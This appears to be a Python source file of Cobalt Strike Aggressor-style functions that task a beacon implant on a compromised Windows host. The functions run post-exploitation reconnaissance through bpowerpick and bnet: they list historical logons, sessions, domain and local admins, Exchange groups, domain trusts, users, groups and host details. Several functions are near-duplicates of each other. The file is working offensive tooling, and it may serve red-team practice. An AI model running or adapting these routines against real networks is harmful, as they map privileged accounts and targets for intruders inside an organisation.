def _(bid):
    """Queue historical-logon collection on beacon ``bid``.

    Calls the sibling ``import_host_recon`` first (presumably it loads the
    ``Get-ExplicitLogons`` / ``Get-Logons`` cmdlets referenced below --
    confirm against its definition), then tasks two ``bnet`` queries and,
    after posting a task description via ``btask``, a PowerShell block
    through ``bpowerpick``.  The tasking order is part of the behaviour and
    is kept as-is.
    """
    import_host_recon(bid)
    for query in ('logons', 'sessions'):
        aggressor.bnet(bid, query)
    # helpers.code_string is a project helper; how it normalises the block
    # (dedent, line endings) is not visible here.  Raw string keeps the
    # PowerShell backtick escape ("`n") intact.
    script = helpers.code_string(r"""
    Write-Output "---------- Explicit logons, past 10 days ----------"
    Get-ExplicitLogons 10
    Write-Output "`n---------- Logons, past 100 events ----------"
    Get-Logons 100
    """)
    aggressor.btask(bid, 'Tasked beacon to get historical logon information')
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """Queue basic domain / local-admin recon on beacon ``bid``.

    A PowerShell block is sent through ``bpowerpick`` first, followed by two
    ``bnet`` tasks.  NOTE: the block's closing ``--- Domain trusts ---``
    header has no command under it; the trusts listing comes from the
    separate ``bnet domain_trusts`` task, so header and listing are produced
    by different beacon jobs and may not appear adjacent in the output.
    A sibling block issues the same queries with ``btask`` and
    ``silent=True``; whether both are meant to stay is not visible here.
    """
    script = textwrap.dedent(r"""
        echo "--- Domain ---"
        echo "$env:logonserver"
        echo "--- Domain admins ---"
        net group "domain admins" /domain
        echo "--- Local admins ---"
        net localgroup administrators
        echo "--- Exchange ---"
        net group "Exchange Trusted Subsystem" /domain 2>$null
        echo "--- Domain trusts ---"
        """)
    aggressor.bpowerpick(bid, script)
    for query in ('dclist', 'domain_trusts'):
        aggressor.bnet(bid, query)
def _(bid):
    """Queue basic domain / local-admin recon on beacon ``bid``.

    Posts a task description via ``btask``, sends a PowerShell block through
    ``bpowerpick`` with ``silent=True``, then tasks two ``bnet`` queries.
    The order of the calls is preserved deliberately: it is the order in
    which the beacon receives the jobs.
    """
    script = textwrap.dedent(r"""
        echo "--- Domain ---"
        echo "$env:logonserver"
        echo "--- Domain admins ---"
        net group "domain admins" /domain
        echo "--- Local admins ---"
        net localgroup administrators
        echo "--- Exchange ---"
        net group "Exchange Trusted Subsystem" /domain 2>$null
        """)
    aggressor.btask(bid, 'Tasked beacon to perform basic domain recon')
    aggressor.bpowerpick(bid, script, silent=True)
    for query in ('dclist', 'domain_trusts'):
        aggressor.bnet(bid, query)
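def _(bid):
    """Queue host / current-user recon on beacon ``bid``.

    Tasks ``bps``, two ``bnet`` queries, and finally a PowerShell block
    through ``bpowerpick``.  The block is now a raw string: the registry
    path contains ``\S``, ``\M``, ``\T`` and ``\D``, which are not Python
    escape sequences.  In a non-raw literal they were passed through
    unchanged but raised "invalid escape sequence" warnings (a SyntaxWarning
    on newer interpreters); the raw literal yields the byte-identical text
    without the warning.
    """
    aggressor.bps(bid)
    for query in ('logons', 'sessions'):
        aggressor.bnet(bid, query)
    script = textwrap.dedent(r"""
        echo "--- Host ---"
        systeminfo
        echo "--- User ---"
        whoami /all
        echo "Domain: $env:logonserver"
        echo "Home: $env:userprofile"
        echo "--- Other ---"
        reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>$null
        echo "--- Location ---"
        pwd
        """)
    aggressor.bpowerpick(bid, script)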
def _(bid):
    """Queue domain-enumeration tasks on beacon ``bid``.

    Four ``bnet`` queries are tasked first, then a PowerShell block through
    ``bpowerpick``.  A sibling block issues the same commands with
    ``btask`` and ``silent=True``; whether both are intended is not visible
    here.
    """
    for query in ('computers', 'view', 'user', 'group'):
        aggressor.bnet(bid, query)
    script = textwrap.dedent("""
        echo "--- Domain ---"
        echo $env:logonserver
        echo "--- Domain users ---"
        net user /domain
        echo "--- Domain groups ---"
        net groups /domain
        echo "--- Domain accounts ---"
        net accounts /domain
        """)
    aggressor.bpowerpick(bid, script)
def _(bid):
    """Queue domain-enumeration tasks on beacon ``bid``.

    Four ``bnet`` queries are tasked first; then a task description is
    posted via ``btask`` and a PowerShell block is sent through
    ``bpowerpick`` with ``silent=True``.  Call order is preserved because it
    is the order the beacon receives the jobs.
    """
    for query in ('computers', 'view', 'user', 'group'):
        aggressor.bnet(bid, query)
    script = textwrap.dedent("""
        echo "--- Domain ---"
        echo $env:logonserver
        echo "--- Domain users ---"
        net user /domain
        echo "--- Domain groups ---"
        net groups /domain
        echo "--- Domain accounts ---"
        net accounts /domain
        """)
    aggressor.btask(bid, 'Tasked beacon to enumerate domain info')
    aggressor.bpowerpick(bid, script, silent=True)